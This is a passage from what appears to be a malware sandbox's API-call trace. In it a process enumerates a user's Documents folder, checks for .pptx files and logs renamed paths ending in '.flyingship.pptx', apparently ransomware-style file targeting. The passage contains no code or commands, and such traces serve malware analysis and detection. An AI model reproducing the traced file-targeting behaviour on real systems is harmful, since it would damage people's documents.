HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dxjhietg4klttzj3vc.pptx")) returned 1 [0168.986] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaa3530, ftCreationTime.dwHighDateTime=0x1d5ccc5, ftLastAccessTime.dwLowDateTime=0x6f08b940, ftLastAccessTime.dwHighDateTime=0x1d5ab25, ftLastWriteTime.dwLowDateTime=0xa0e9280, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xfcf2, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="dXJHIETG4kltTzJ3VC.pptx", cAlternateFileName="DXJHIE~1.PPT")) returned 0 [0168.986] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0168.986] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.987] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.988] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.988] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.989] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.989] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.989] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0168.989] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.989] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0168.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.990] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0168.990] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0xd34, lpOverlapped=0x0) returned 1 [0168.991] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0168.991] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xd34, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.991] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.flyingship.pptx\r\n", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0168.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4d) returned 0x923ad0 [0168.991] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.flyingship.pptx\r\n", cchWideChar=77, lpMultiByteStr=0x923ad0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.flyingship.pptx\r\n", lpUsedDefaultChar=0x0) returned 77 [0168.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0168.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0168.991] WriteFile (in: hFile=0x120, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4c, lpOverlapped=0x0) returned 1 [0168.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0168.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.992] CloseHandle (hObject=0x120) returned 1 [0168.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0168.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0168.995] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0168.995] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0168.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.997] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0168.997] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.997] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.997] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0168.998] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0168.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0168.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0168.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0168.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0169.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0169.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0169.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0169.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0169.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0169.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0169.001] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0169.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 